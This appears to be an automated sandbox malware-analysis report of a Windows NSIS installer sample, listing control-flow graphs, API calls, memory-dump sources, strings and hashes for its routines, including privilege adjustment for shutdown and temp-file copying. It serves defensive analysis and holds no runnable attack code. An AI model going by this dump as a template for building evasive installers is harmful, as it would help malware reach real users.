4063e8 * 2 88->99 91->84 97 4037cc 91->97 92->91 92->97 97->80 99->60 100->54 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                          • GetVersion.KERNEL32 ref: 004034CE
                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                          • #17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
                                                                                                          • CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,00000006,?,0000000A), ref: 004035AE
                                                                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004036E8
                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004036F9
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403705
                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403719
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403721
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403732
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040373A
                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 0040374E
                                                                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                          • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
                                                                                                          • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403867
                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403873
                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040388F
                                                                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\c7WJL1gt32.exe,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
                                                                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
                                                                                                          • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                          • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Iw\Bombestoppets$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\c7WJL1gt32.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                          • API String ID: 3441113951-3704935325
                                                                                                          • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                          • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                          • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                          • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 158 4051c7-4051cf 152->158 159 405158-40515e 152->159 153->154 154->151 161 405089-40508c 155->161 162 4050fc-4050ff 155->162 156->152 156->155 190 404f33-404f39 157->190 191 404ff8-40500b GetWindowLongW SetWindowLongW 157->191 167 4051d1-4051d7 SendMessageW 158->167 168 4051d9-4051e0 158->168 164 405164-40516e 159->164 165 4053af-4053c1 call 4043c6 159->165 170 405097-4050ac call 404d1a 161->170 171 40508e-405095 161->171 162->152 166 405101-40510b 162->166 164->165 173 405174-405183 SendMessageW 164->173 175 40511b-405125 166->175 176 40510d-405119 SendMessageW 166->176 167->168 177 4051e2-4051e9 168->177 178 405214-40521b 168->178 170->162 200 4050ae-4050bf 170->200 171->162 171->170 173->165 184 405189-40519a SendMessageW 173->184 175->152 186 405127-405131 175->186 176->175 187 4051f2-4051f9 177->187 188 4051eb-4051ec ImageList_Destroy 177->188 182 405371-405378 178->182 183 405221-40522d call 4011ef 178->183 182->165 195 40537a-405381 182->195 211 40523d-405240 183->211 212 40522f-405232 183->212 193 4051a4-4051a6 184->193 194 40519c-4051a2 184->194 196 405142-40514c 186->196 197 405133-405140 186->197 198 405202-40520e 187->198 199 4051fb-4051fc GlobalFree 187->199 188->187 202 404f3c-404f43 190->202 206 405011-405015 191->206 204 4051a7-4051c0 call 401299 SendMessageW 193->204 194->193 194->204 195->165 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 195->205 196->152 197->152 198->178 199->198 200->162 201 4050c1-4050c3 200->201 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->158 205->165 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 217 4050d2-4050d4 207->217 218 4050ce-4050d0 207->218 221 4050d9-4050f5 call 40117d 208->221 209->202 225 404ff2-404ff6 209->225 219 404f73-404fa9 SendMessageW 210->219 220 404fab-404fad 210->220 226 405281-4052a5 call 4011ef 211->226 227 405242-40525b call 4012e2 call 401299 211->227 222 405234 212->222 223 405235-405238 call 404d9a 212->223 214->165 215->140 217->221 218->221 219->209 231 404fc0-404fd6 SendMessageW 220->231 232 404faf-404fbe SendMessageW 220->232 221->162 222->223 223->211 225->191 225->206 240 405347-40535b InvalidateRect 226->240 241 4052ab 226->241 249 40526b-40527a SendMessageW 227->249 250 40525d-405263 227->250 231->209 232->209 240->182 243 40535d-40536c call 404ced call 404cd5 240->243 244 4052ae-4052b9 241->244 243->182 246 4052bb-4052ca 244->246 247 40532f-405341 244->247 254 4052cc-4052d9 246->254 255 4052dd-4052e0 246->255 247->240 247->244 249->226 251 405265 250->251 252 405266-405269 250->252 251->252 252->249 252->250 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->247 260->259
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404E39
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                          • SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404FFD
                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 004051B7
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                          • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $M$N
                                                                                                          • API String ID: 1638840714-813528018
                                                                                                          • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                          • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                          • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                          • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                          APIs
                                                                                                            • Part of subcall function 6CF1121B: GlobalAlloc.KERNEL32(?,?,6CF1123B,?,6CF112DF,00000019,6CF111BE,-000000A0), ref: 6CF11225
                                                                                                          • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 6CF11C6B
                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6CF11CB3
                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6CF11CBD
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF11CD0
                                                                                                          • GlobalFree.KERNEL32(?), ref: 6CF11DB2
                                                                                                          • GlobalFree.KERNEL32(?), ref: 6CF11DB7
                                                                                                          • GlobalFree.KERNEL32(?), ref: 6CF11DBC
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF11FA6
                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 6CF12140
                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6CF121B5
                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6CF121C6
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 6CF12220
                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 6CF1223A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 245916457-0
                                                                                                          • Opcode ID: e5293229c9db1930f67d1765491f901286db23da085cb7576fc38b1ad73cc6f4
                                                                                                          • Instruction ID: 22ec104ad7a1ef543e94fe25ea3128ff7fe5bfa774b0148a99380d4653f0d6a6
                                                                                                          • Opcode Fuzzy Hash: e5293229c9db1930f67d1765491f901286db23da085cb7576fc38b1ad73cc6f4
                                                                                                          • Instruction Fuzzy Hash: E4227A72D5C246DFDB10CFA9C8846EEBBB0FB16319F20862ED165E3E80D77196858B50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 787 405afa-405b20 call 405dc5 790 405b22-405b34 DeleteFileW 787->790 791 405b39-405b40 787->791 792 405cb6-405cba 790->792 793 405b42-405b44 791->793 794 405b53-405b63 call 4063e8 791->794 795 405c64-405c69 793->795 796 405b4a-405b4d 793->796 800 405b72-405b73 call 405d09 794->800 801 405b65-405b70 lstrcatW 794->801 795->792 799 405c6b-405c6e 795->799 796->794 796->795 802 405c70-405c76 799->802 803 405c78-405c80 call 40672b 799->803 804 405b78-405b7c 800->804 801->804 802->792 803->792 810 405c82-405c96 call 405cbd call 405ab2 803->810 808 405b88-405b8e lstrcatW 804->808 809 405b7e-405b86 804->809 811 405b93-405baf lstrlenW FindFirstFileW 808->811 809->808 809->811 827 405c98-405c9b 810->827 828 405cae-405cb1 call 405450 810->828 812 405bb5-405bbd 811->812 813 405c59-405c5d 811->813 815 405bdd-405bf1 call 4063e8 812->815 816 405bbf-405bc7 812->816 813->795 818 405c5f 813->818 829 405bf3-405bfb 815->829 830 405c08-405c13 call 405ab2 815->830 819 405bc9-405bd1 816->819 820 405c3c-405c4c FindNextFileW 816->820 818->795 819->815 823 405bd3-405bdb 819->823 820->812 826 405c52-405c53 FindClose 820->826 823->815 823->820 826->813 827->802 831 405c9d-405cac call 405450 call 4061ae 827->831 828->792 829->820 832 405bfd-405c06 call 405afa 829->832 840 405c34-405c37 call 405450 830->840 841 405c15-405c18 830->841 831->792 832->820 840->820 844 405c1a-405c2a call 405450 call 4061ae 841->844 845 405c2c-405c32 841->845 844->820 845->820
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B23
                                                                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B6B
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B8E
                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B94
                                                                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405BA4
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                          • API String ID: 2035342205-1057503074
                                                                                                          • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                          • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                          • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                          • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 976 406943-406966 977 406970-406973 976->977 978 406968-40696b 976->978 980 406976-40697f 977->980 979 407390-407394 978->979 981 406985 980->981 982 40738d 980->982 983 406a31-406a35 981->983 984 406aa1-406aa5 981->984 985 40698c-406990 981->985 986 406acc-407173 981->986 982->979 987 4072e1-4072eb 983->987 988 406a3b-406a54 983->988 991 4072f0-4072fa 984->991 992 406aab-406abf 984->992 989 406996-4069a3 985->989 990 407378-40738b 985->990 995 407175-40718b 986->995 996 40718d-4071a3 986->996 987->990 994 406a57-406a5b 988->994 989->982 997 4069a9-4069ef 989->997 990->979 991->990 998 406ac2-406aca 992->998 994->983 999 406a5d-406a63 994->999 1000 4071a6-4071ad 995->1000 996->1000 1001 4069f1-4069f5 997->1001 1002 406a17-406a19 997->1002 998->984 998->986 1003 406a65-406a6c 999->1003 1004 406a8d-406a9f 999->1004 1005 4071d4-4071e0 1000->1005 1006 4071af-4071b3 1000->1006 1007 406a00-406a0e GlobalAlloc 1001->1007 1008 4069f7-4069fa GlobalFree 1001->1008 1009 406a27-406a2f 1002->1009 1010 406a1b-406a25 1002->1010 1011 406a77-406a87 GlobalAlloc 1003->1011 1012 406a6e-406a71 GlobalFree 1003->1012 1004->998 1005->980 1013 407362-40736c 1006->1013 1014 4071b9-4071d1 1006->1014 1007->982 1016 406a14 1007->1016 1008->1007 1009->994 1010->1009 1010->1010 1011->982 1011->1004 1012->1011 1013->990 1014->1005 1016->1002
                                                                                                          Strings
                                                                                                          • ogram cannot be run in DOS mode.$, xrefs: 00406943
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ogram cannot be run in DOS mode.$
                                                                                                          • API String ID: 0-3978178379
                                                                                                          • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                          • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                          • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                          • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                          • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                          • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                          • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406736
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID: xgB
                                                                                                          • API String ID: 2295610775-399326502
                                                                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                          • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
